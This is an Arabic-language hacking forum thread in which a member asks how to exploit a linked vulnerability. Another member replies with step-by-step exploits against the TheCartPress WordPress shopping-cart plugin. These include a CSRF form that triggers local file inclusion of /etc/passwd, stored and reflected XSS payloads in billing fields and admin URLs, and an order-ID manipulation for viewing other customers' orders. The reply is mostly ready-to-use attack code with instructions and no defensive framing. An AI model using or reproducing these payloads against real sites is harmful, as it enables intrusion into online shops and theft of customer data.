قديم 05-01-2015, 05:54 AM   المشاركة رقم: 1
الكاتب
patri30
.:: عضو جديد ::.
المعلومات  
التسجيل: Apr 2015
العضوية: 205899
المشاركات: 2
بمعدل : 0.00 يوميا
الإتصال patri30 غير متواجد حالياً


المنتدى  
Post إستفسار حول كيفية تطبيق هذه الثغرت ..؟؟

السلام عليكم ورحمة الله وبركاته ..


.



ممكن من صقور أمان العرب شرح كيفية التعامل مع هذه الثغرة

[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]












عرض البوم صور patri30   رد مع اقتباس

قديم 05-09-2015, 05:40 PM   المشاركة رقم: 2
الكاتب
patri30
.:: عضو جديد ::.
المعلومات  
التسجيل: Apr 2015
العضوية: 205899
المشاركات: 2
بمعدل : 0.00 يوميا
الإتصال patri30 غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

!!!












عرض البوم صور patri30   رد مع اقتباس

قديم 05-10-2015, 10:13 PM   المشاركة رقم: 3
الكاتب
El Syad
.:: عضو مميز ::.
 
الصورة الرمزية El Syad
المعلومات  
التسجيل: Nov 2012
العضوية: 158084
الدولة: Egypt
المشاركات: 625
بمعدل : 0.29 يوميا
الإتصال El Syad غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي


اهلا بيك يا برنس
فى قسم خاص للمشاكل
مع كده هساعدك ان شاء الله
اول ثغرة Local File include
عشان الثغرة تشتغل معاك تمام
لازم يكون الادمن فاتح العضوية بتاعته يعنى يكون فاتح عضوية الادمن
وبعدين ؟؟
اول حاجة هتروح وتاخد الاستغلال ده
كود PHP:
<form action="http://wordpress/wp-admin/admin.php?page=checkout_editor_settings" method="post" ****="main"><input type="hidden" ****="tcp_save_fields"  value='1'><input type="hidden" ****="tcp_box_path"  value='../../../../../etc/passwd'><input type="submit" id="btn"></form>********** ********.main.submit();</script> 
وتحطه فى ملف نصى وبعدين تحفظه لصفحة html
يعنى تاخد الكود ده وتحطه باى ملف نصى فاضى وبعدين تعمل Save as وتخلى الملف باى اسم بس لازم يكون فى الامتداد html كمثال يعنى
code.html
تمام كده دى اول ثغرة يا برنس
تانى واحدة دى ثغرة Xss Stored يعنى خطيرة
اول حاجة تعملها تاخد الكود ده
وتعمله حفظ بالنفس الطريقة للثغرة الاولى
كود PHP:
<form action="http://wordpress/shopping-cart/checkout/" method="post" ****="main"><input type="hidden" ****="selected_billing_id"  value='1'><input type="hidden" ****="selected_billing_address"  value='new'><input type="hidden" ****="billing_first****"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_last****"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_company"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_tax_id_number"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_country_id"  value='AF'><input type="hidden" ****="billing_region_id"  value=''><input type="hidden" ****="billing_region"  value=''><input type="hidden" ****="billing_city"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_street"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_street_2"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_postcode"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_telephone_1"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_telephone_2"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_fax"  value='">***************(/immuni***/);</script>'><input type="hidden" ****="billing_email"  value='mail@mail.com'><input type="hidden" ****="tcp_continue"  value=''><input type="hidden" ****="tcp_step"  value='1'><input type="submit" id="btn"></form
التغيرات هتكون فى Prefix هنا
كود PHP:
billing_ 

هتبدلها بدى
كود PHP:
shipping_ 

وابقى بص هنا بعد ما تعمل اللازم
كود PHP:
http://wordpress/wp-admin/admin-ajax.php?order_id=[order_id]&action=tcp_print_order 

الثغرة التالتة
دى يعتبر سرقة
بمعنى اوضح
خش على الرابط ده
كود PHP:
http://wordpress/shopping-cart/checkout/?tcp_checkout=ok&order_id=[order_id] 
والتغير هيكون مكان order_id يعنى مثلا لو حطينا
كود PHP:
http://wordpress/wp-admin/admin-ajax.php?order_id=1&action=tcp_print_order 
ومن خلال الثغرة دى المفروض اللى انا فهمته من المكتشف لانى ضعيف فى الانجلش
انها هتستعرضلك الداتا الخاصة بكل Order انت هتحط ال ID بتاعه
اخر ثغرة
من نوع Xss
الاستغلال جاهز يا برنس
كود PHP:
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3E*****%28%27immuni***%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Eale 
وده استغلال تانى ل Parameter تانى
كود PHP:
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3E*****%28%27immuni***%27%29;%3C/script%3E 
انا شرحتهملك على قد ما قدرت لانى ضعيف فى الانجلش
بس لو عاوز نصيحتى اكتر
ابقى شوف الرابط ده فيها استغلال اوضح للثغرات الى من النوع ده
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]
ان شاء الله اكون فدتك يا برنس
موفق












توقيع : El Syad

دخولى للمنتديات تصفح وقرائة فقط !
اى مساعدة او استفسار او سؤال على الاسك
[فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط. اضغط هنا للتسجيل]
الصياد /.
عرض البوم صور El Syad   رد مع اقتباس

قديم 05-12-2015, 01:34 AM   المشاركة رقم: 4
الكاتب
مستر قلق
.:: { اسد صنعاء } ::.
المعلومات  
التسجيل: Feb 2009
العضوية: 10021
المشاركات: 9,407
بمعدل : 2.66 يوميا
الإتصال مستر قلق غير متواجد حالياً


كاتب الموضوع  المنتدى  
افتراضي

الصياد مسوي شرح على سور الصين العظيم












عرض البوم صور مستر قلق   رد مع اقتباس

إضافة رد

مواقع النشر (المفضلة)


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[ استفسار ] كيفية استغلال الثغرة + تخطي الحماية .. G~SiDe [ مشاكل وحلول اختراق المواقع ] 0 08-26-2011 02:20 PM
[فيديو] شرح مفصل عن كيفية اختراق الجهزة بالميتا عن طريق الثغرة ms08_067_netapi mrigal [ اختراق الاجـهـزه والايـمـيـلات ] 25 08-28-2010 09:31 PM
[ مساعدة ] اخواني اريد شل .. وشرح كيفية استغلال الثغرة ورفع الشل من عليها WT2R [ مشاكل وحلول اختراق المواقع ] 3 11-02-2009 07:01 PM
الرجاء المساعدة في تطبيق هذه الثغرة gitanes.hacker [ مشاكل وحلول اختراق المواقع ] 5 09-30-2009 05:48 PM
حصريا ضع الثغرة وسيتم شرحها لك فيديو مع تطبيق على موقع ALshehhi [ الـثـغـرات ] 8 06-29-2008 01:34 PM


الساعة الآن 07:23 AM.


Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.